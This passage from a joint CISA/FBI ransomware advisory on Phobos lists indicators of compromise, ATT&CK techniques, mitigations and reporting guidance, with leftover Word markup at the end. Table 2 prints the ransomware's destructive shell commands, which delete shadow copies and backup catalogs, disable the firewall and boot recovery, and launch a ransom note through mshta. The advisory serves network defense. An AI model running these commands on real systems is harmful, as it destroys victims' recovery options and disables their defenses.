Phobos affiliates: Devos, Eight, Elbie, Eking, and Faust.[6]</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 Phobos Affiliate Providers List INDICATORS OF COMPROMISE (IOCs)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See Table 1 through 6 for IOCs obtained from CISA and the FBI investigations from September through November 2023. Table 1: Associated Phobos Domains Associated Phobos Domains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adstat477d[.]xyz</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demstat577d[.]xyz [12]</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serverxlogs21[.]xyz Table 2: Observed Phobos Shell Commands Shell Commands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vssadmin delete shadows /all /quiet [T1490]</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netsh advfirewall set currentprofile state off</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wmic shadowcopy delete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netsh firewall set opmode mode=disable [T1562.004]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bcdedit /set {default} bootstatuspolicy ignoreallfailures [T1547.001]</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bcdedit /set {default} recoveryenabled no [T1490]</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wbadmin delete catalog -quiet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mshta C:\%USERPROFILE%\Desktop\info.hta [T1218.005]</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mshta C:\%PUBLIC%\Desktop\info.hta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mshta C:\info.hta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commands above are observed during the execution of a Phobos encryption executable. A Phobos encryption executable spawns a cmd.exe process, which then executes the commands listed in Table 1 with their respective Windows system executables. When the commands above are executed on a Windows system, volume shadow copies are deleted and Windows Firewall is disabled. Additionally, the system's boot status policy is set to boot even when there are errors during the boot process, and automatic recovery options, like Windows Recovery Environment (WinRE), are disabled for the given boot entry. The system's backup catalog is also deleted. Finally, the Phobos ransom note is displayed to the end user using mshta.exe. Table 3: Observed Phobos Registry Keys Registry Keys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HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\&lt;Phobos exe name&gt;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C:/Users\Admin\AppData\Local\directory Table 4: Observed Phobos Actor Email Addresses Email Addresses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AlbetPattisson1981@protonmail[.]com</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henryk@onionmail[.]org</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atomicday@tuta[.]io</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info@fobos[.]one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axdus@tuta[.]io</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it.issues.solving@outlook[.]com</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barenuckles@tutanota[.]com</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JohnWilliams1887@gmx[.]com</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Bernard.bunyan@aol[.]com</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jonson_eight@gmx[.]us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bill.g@gmx[.]com</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joshuabernandead@gmx[.]com</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bill.g@msgsafe[.]io</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LettoIntago@onionmail[.]com</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bill.g@onionmail[.]org</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Luiza.li@tutanota[.]com</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bill.gTeam@gmx[.]com</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MatheusCosta0194@gmx[.]com</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blair_lockyer@aol[.]com</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mccreight.ellery@tutanota[.]com</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CarlJohnson1948@gmx[.]com</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megaport@tuta[.]io</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cashonlycash@gmx[.]com</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miadowson@tuta[.]io</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chocolate_muffin@tutanota[.]com</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MichaelWayne1973@tutanota[.]com</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claredrinkall@aol[.]com</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normanbaker1929@gmx[.]com</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clausmeyer070@cock[.]li</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nud_satanakia@keemail[.]me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colexpro@keemail[.]me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please@countermail[.]com</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cox.barthel@aol[.]com</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precorpman@onionmail[.]org</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crashonlycash@gmx[.]com</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recovery2021@inboxhub[.]net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everymoment@tuta[.]io</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recovery2021@onionmail[.]org</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expertbox@tuta[.]io</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SamuelWhite1821@tutanota[.]com</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fastway@tuta[.]io</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SaraConor@gmx[.]com</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fquatela@techie[.]com</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secdatltd@gmx[.]com</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fredmoneco@tutanota[.]com</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skymix@tuta[.]io</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getdata@gmx[.]com</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sory@countermail[.]com</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greenbookBTC@gmx[.]com</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spacegroup@tuta[.]io</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greenbookBTC@protonmail[.]com</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stafordpalin@protonmail[.]com</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helperfiles@gmx[.]com</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starcomp@keemail[.]me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helpermail@onionmail[.]org</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xdone@tutamail[.]com</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helpfiles@onionmail[.]org</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xgen@tuta[.]io</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helpfiles102030@inboxhub[.]net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xspacegroup@protonmail[.]com</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helpforyou@gmx[.]com</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zgen@tuta[.]io</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helpforyou@onionmail[.]org</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zodiacx@tuta[.]io Table 5: Observed Phobos Actor Telegram Username Telegram Username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@phobos_support Table 6: Observed Phobos Actor Wickr Address Wickr Address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Vickre me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Disclaimer: Organizations are encouraged to investigate the use of the IOCs in Table 7 for related signs of compromise prior to performing remediation actions. Table 7: Phobos IOCs from September through December 2023 Associated IP Address File Type File Name SHA 256 Hash</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194.165.16[.]4 (October 2023)</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Win32.exe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Ahpdate.exe [13]</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0000599cbc6e5b0633c5a6261c79e4d3d81005c77845c6b0679d854884a8e02f</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45.9.74[.]14 (December 2023)</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147.78.47[.]224 (December 2023)</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Executable and Linkable Format (ELF) [14]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1570442295</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(Trojan Linux Mirai)</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7451be9b65b956ee667081e1141531514b1ec348e7081b5a9cd1308a98eec8f0</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185.202.0[.]111 (September 2023)</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Win32.exe [15]</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cobaltstrike_shellcode[.]exe (C2 activity)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185.202.0[.]111 (December 2023)</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.txt [16]</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f1425cff3d28afe5245459afa6d7985081bc6a62f86dce64c63daeb2136d7d2c.bin (Trojan)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Disclaimer: Organizations are encouraged to investigate the use of the file hashes in Tables 8 and 9 for related signs of compromise prior to performing remediation actions. Table 8: Phobos Actor File Hashes Observed in October 2023 Phobos Ransomware SHA 256 Malicious Trojan Executable File Hashes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518544e56e8ccee401ffa1b0a01a10ce23e49ec21ec441c6c7c3951b01c1b19c</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9215550ce3b164972413a329ab697012e909d543e8ac05d9901095016dd3fc6c</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482754d66d01aa3579f007c2b3c3d0591865eb60ba60b9c28c66fe6f4ac53c52</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c0539fd02ca0184925a932a9e926c681dc9c81b5de4624250f2dd885ca5c4763 Table 9: Phobos Actor File Hashes from Open Source from November 2023 [17] Phobos Ransomware SHA 256 File Hashes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58626a9bfb48cd30acd0d95debcaefd188ae794e1e0072c5bde8adae9bccafa6</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f3be35f8b8301e39dd3dffc9325553516a085c12dc15494a5e2fce73c77069ed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518544e56e8ccee401ffa1b0a01a10ce23e49ec21ec441c6c7c3951b01c1b19c</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32a674b59c3f9a45efde48368b4de7e0e76c19e06b2f18afb6638d1a080b2eb3</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2704e269fb5cf9a02070a0ea07d82dc9d87f2cb95e60cb71d6c6d38b01869f66</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fc4b14250db7f66107820ecc56026e6be3e8e0eb2d428719156cf1c53ae139c6</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a91491f45b851a07f91ba5a200967921bf796d38677786de51a4a8fe5ddeafd2 MITRE ATT&amp;CK TECHNIQUES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See Table 10 through 22 for all threat actor tactics and techniques referenced in this advisory. Table 10: Phobos Threat Actors ATT&amp;CK Techniques for Enterprise - Reconnaissance Technique Title ID Use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Search Open Websites/Domains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T1593</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Phobos actors perform open source research to find information about victims that can be used during targeting to create a victim profile.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Scanning IP Blocks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T1595.001</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Phobos actors used IP scanning tools to include Angry IP Scanner to search for vulnerable RDP ports.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Phishing for Information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T1598</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Phobos actors use phishing campaigns to social engineer information from users and gain access to vulnerable RDP ports. Table 11: Phobos Threat Actors ATT&amp;CK Techniques for Enterprise - Resource Development Technique Title ID Use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Establish Accounts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T1585</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Phobos actors establish accounts to communicate.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Obtain Capabilities: Tool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T1588.002</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Phobos actors used open source tools in their attack. Table 12: Phobos Threat Actors ATT&amp;CK Techniques for Enterprise - Initial Access Technique Title ID Use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Valid Accounts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T1078</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Following successful RDP authentication, Phobos actors search for IP addresses and pair them with their associated computer to create a victim profile.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External Remote Services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T1133</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Phobos actors may leverage external-facing remote services to initially access and/or persist within a network.</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Phishing: Spearphishing Attachment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T1566.001</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Phobos actors used a spoofed email attachment to execute attack. Table 13: Phobos Threat Actors ATT&amp;CK Techniques for Enterprise - Execution Technique Title ID Use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Windows Management Instrumentation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T1047</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Phobos actors used Windows Management Instrumentation command-line utility (WMIC) to prevent victims from recovering files.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Windows Command Shell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T1059.003</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Phobos actors can use the previous commands to perform commands with windows shell functions.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Native API</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T1106</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Phobos actors used open source tools to enumerate the active directory.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Malicious File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T1204.002</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Phobos actors attached a malicious email attachment to deliver ransomware. Table 14: Phobos Threat Actors ATT&amp;CK Techniques for Enterprise - Persistence Technique Title ID Use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Registry Run Keys / Startup Folder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T1547.001</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Phobos ransomware operates using the Exec.exe control mechanism and has been observed using Windows Startup folders and Run Registry Keys. Table 15: Phobos Threat Actors ATT&amp;CK Techniques for Enterprise - Privilege Escalation Technique Title ID Use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Privilege Escalation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TA0004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Phobos actors use run commands like 1saas.exe, or cmd.exe to deploy additional Phobos payloads with escalated privileges.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Portable Executable Injection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T1055.002</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Phobos actors use Smokeloader to inject code into running processes to identify an entry point through enabling a VirtualAlloc or VirtualProtect process.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Asynchronous Procedure Call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T1055.004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During phase two of execution, Phobos ransomware sends a call back from an identified entry point.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Access Token Manipulation: Token Impersonation/Theft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T1134.001</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Phobos actors can use Windows API functions to steal tokens.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Create Process with Token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T1134.002</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Phobos actors used Windows API functions to steal tokens, bypass access controls and create new processes. Table 16: Phobos Threat Actors ATT&amp;CK Techniques for Enterprise - Defense Evasion Technique Title ID Use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Software Packing</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T1027.002</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Phobos actors deployed a portable executable (PE) to conceal code.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Embedded Payloads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T1027.009</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Phobos actors embedded the ransomware as a hidden payload by using Smokeloader.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Deobfuscate/Decode Files or Information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T1140</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During phase two of execution, Phobos actors' malware stores and decrypts information.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System Binary Proxy Execution: Mshta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T1218.005</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Phobos actors used Mshta to execute malicious files.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Impair Defenses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T1562</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Phobos actors can use Universal Virus Sniffer, Process Hacker, and PowerTool to evade detection.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Disable or Modify System Firewall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T1562.004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Phobos ransomware has been observed bypassing organizational network defense protocols through modifying system firewall configurations. Table 17: Phobos Threat Actors ATT&amp;CK Techniques for Enterprise - Credential Access Technique Title ID Use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OS Credential Dumping: LSASS Memory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T1003.001</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Phobos actors used Mimikatz to export credentials.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OS Credential Dumping: Cached Domain Credentials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T1003.005</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Phobos actors use cached domain credentials to authenticate as the domain administrator in the event a domain controller is unavailable.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Brute Force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T1110</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Phobos actors may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.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Credentials from Password Stores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T1555</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Phobos actors may search for common password storage locations to obtain user credentials.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Credentials from Password Stores: Credentials from Web Browsers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T1555.003</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Phobos actors use Nirsoft or Passview to export client credentials from web browsers.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Phobos actors search for stored credentials in browser clients once they gain initial network access.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Credentials from Password Stores: Password Managers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T1555.005</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Phobos actors targeted victim's databases for password management software. Table 18: Phobos Threat Actors ATT&amp;CK Techniques for Enterprise - Discovery Technique Title ID Use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Process Discovery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T1057</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Phobos ransomware is able to run processes.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System Information Discovery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T1082</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Phobos ransomware is able to enumerate connected storage devices.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File and Directory Discovery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T1083</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Phobos ransomware can encrypt user files.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Domain Account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T1087.002</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Phobos threat actor used Bloodhound and Sharphound to enumerate the active directory. Table 19: Phobos Threat Actors ATT&amp;CK Techniques for Enterprise - Collection Technique Title ID Use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Archive Collected Data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T1560</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Phobos threat actors archive data as either a .rar or .zip file to be later exfiltrated. Table 20: Phobos Threat Actors ATT&amp;CK Techniques for Enterprise - Command and Control Technique Title ID Use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Data Obfuscation: Protocol Impersonation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T1001.003</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Phobos actors used a stealth process to obfuscate C2 activity.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File Transfer Protocols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T1071.002</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Phobos threat actors used WinSCP to connect the victim's network to an FTP server.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Ingress Tool Transfer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T1105</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Phobos ransomware extracts its final payload from the hashed file.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Remote Access Software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T1219</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Phobos threat actors used remote access tools to establish a remote connection within victim's network. Table 21: Phobos Threat Actors ATT&amp;CK Techniques for Enterprise - Exfiltration Technique Title ID Use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Exfiltration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TA0010</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Phobos threat actors may use exfiltration techniques to steal data from your network.</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Exfiltration Over Alternative Protocol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T1048</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Phobos threat actors use software to export files to a cloud.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Exfiltration to Cloud Storage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T1567.002</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Phobos threat actors use Mega.io to exfiltrate data to a cloud storage service rather than over their primary command and control channel. Table 22: Phobos Threat Actors ATT&amp;CK Techniques for Enterprise - Impact Technique Title ID Use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Data Encrypted for Impact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T1486</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Phobos threat actors use the Phobos.exe command to encrypt data on all logical drives connected to the network.</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Inhibit System Recovery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T1490</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Phobos threat actors may delete or remove backups to include volume shadow copies from Windows environments to prevent victim data recovery response efforts.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Financial Theft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T1657</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Phobos threat actor's extort victims for financial gain. MITIGATIONS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Secure by Design and Default Mitigations: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These mitigations apply to all critical infrastructure organizations and network defenders. The FBI, CISA, and MS-ISAC recommend that software manufacturers incorporate secure by design and default principles and tactics into their software development practices limiting the impact of ransomware techniques, thus, strengthening the secure posture for their customers.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more information on secure by design, see CISA's Secure by Design webpage and joint guide.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FBI, CISA, and MS-ISAC recommend organizations implement the mitigations below to improve your organization's cybersecurity posture against actors' activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA's Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Secure remote access software by applying recommendations from the joint Guide to Securing Remote Access Software.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement application controls to manage and control execution of software, including allowlisting remote access programs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlist solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement log collection best practices and use intrusion detection systems to defend against threat actors manipulating firewall configurations through early detection [CPG 2.T].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement EDR solutions to disrupt threat actor memory allocation techniques.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Strictly limit the use of RDP and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]: Audit the network for systems using RDP.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Close unused RDP ports.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enforce account lockouts after a specified number of attempts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Apply phishing-resistant multifactor authentication (MFA).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Log RDP login attempts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable command-line and scripting activities and permissions [CPG 2.N]. Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 4.C].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 2.E]. Reduce the threat of credential compromise via the following: Place domain admin accounts in the protected users' group to prevent caching of password hashes locally.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Refrain from storing plaintext credentials in scripts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement time-based access for accounts at the admin level and higher [CPG 2.A, 2.E].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In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors: Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Maintain offline backups of data and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization limits the severity of disruption to its business practices [CPG 2.R].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST's standards for developing and managing password policies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use longer passwords consisting of at least 15 characters and no more than 64 characters in length [CPG 2.B].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Store passwords in hashed format using industry-recognized password managers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Add password user "salts" to shared login credentials.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Avoid reusing passwords [CPG 2.C].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement multiple failed login attempt account lockouts [CPG 2.G]. Disable password "hints." Refrain from requiring password changes more frequently than once per year. Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password "patterns" cyber criminals can easily decipher.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Require administrator credentials to install software.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Require phishing-resistant multifactor authentication (MFA) for all services to the extent possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems [CPG 2.H]. Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between-and access to-various subnetworks and by restricting adversary lateral movement [CPG 2.F].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic and activity, including lateral movement, on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Install, regularly update, and enable real time detection for antivirus software on all hosts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable unused ports and protocols [CPG 2.V].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Consider adding an email banner to emails received from outside your organization [CPG 2.M].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable hyperlinks in received emails.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensure all backup data is encrypted, immutable (i.e., ensure backup data cannot be altered or deleted), and covers the entire organization's data infrastructure [CPG 2.K, 2.L, 2.R]. VALIDATE SECURITY CONTROLS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addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. The FBI, CISA, and MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.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 get started: Select an ATT&amp;CK technique described in this advisory (see Tables 4-16). Align your security technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Test your technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Analyze your detection and prevention technologies' performance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Tune your security program, including people, processes, and technologies, based on the data generated by this process.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FBI, CISA, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory. RESOURCES Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Resource to mitigate a ransomware attack: CISA, NSA, FBI, and Multi-State Information Sharing and Analysis Center's (MS-ISAC) Joint #StopRansomware Guide.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>SLTT organizations are encouraged to implement MS-ISAC's Ransomware Defense- in-Depth guidance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CISA: Known Exploited Vulnerabilities Catalog CISA, MITRE: Best Practices for MITRE ATT&amp;CK Mapping CISA: Decider Tool CISA: Cross-Sector Cybersecurity Performance Goals CISA: Secure by Design CISA: Implementing Phishing-Resistant MFA CISA: Guide to Securing Remote Access Software REFERENCES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[1] Privacy Affairs: "Moral" 8Base Ransomware Targets 2 New Victims [2] VMware: 8base ransomware: A Heavy Hitting Player [3] Infosecurity Magazine: Phobos Ransomware Family Expands With New FAUST Variant [4] The Record: Hospitals offline across Romania following ransomware attack on IT platform [5] Comparitech: What is Phobos Ransomware &amp; How to Protect Against It? [6] Cisco Talos: Understanding the Phobos affiliate structure and activity [7] Cisco Talos: A deep dive into Phobos ransomware, recently deployed by 8Base group [8] Malwarebytes Labs: A deep dive into Phobos ransomware [9] Any Run: Smokeloader [10] Malpedia: Smokeloader [11] Truesec: A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>case of the FAUST Ransomware [12] VirusTotal: Phobos Domain #1 [13] VirusTotal: Phobos executable: Ahpdate.exe [14] VirusTotal: Phobos GUI extension: ELF File [15] VirusTotal: Phobos IP address: 185.202.0[.]111 [16] VirusTotal: Phobos GUI extension: Binary File [17] Cisco Talos GitHub: IOCs/2023/11/deep-dive-into-phobos-ransomware.txt at main REPORTING</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FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom-note, communications with Phobos actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.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Additional details requested include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host and network-based indicators.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FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3), a local FBI Field Office, or to CISA at report@cisa.gov or (888) 282-0870. DISCLAIMER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FBI does not conduct its investigative activities or base attribution solely on activities protected by the First Amendment. Your company has no obligation to respond or provide information back to the FBI in response to this engagement. If, after reviewing the information, your company decides to provide referral information to the FBI, it must do so in a manner consistent with federal law. The FBI does not request or expect your company to take any particular action regarding this information other than holding it in confidence due to its sensitive nature.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information in this report is being provided "as is" for informational purposes only. The FBI and CISA not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise does not constitute or imply endorsement, recommendation, or favoring by CISA, the FBI, and the MS-ISAC.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
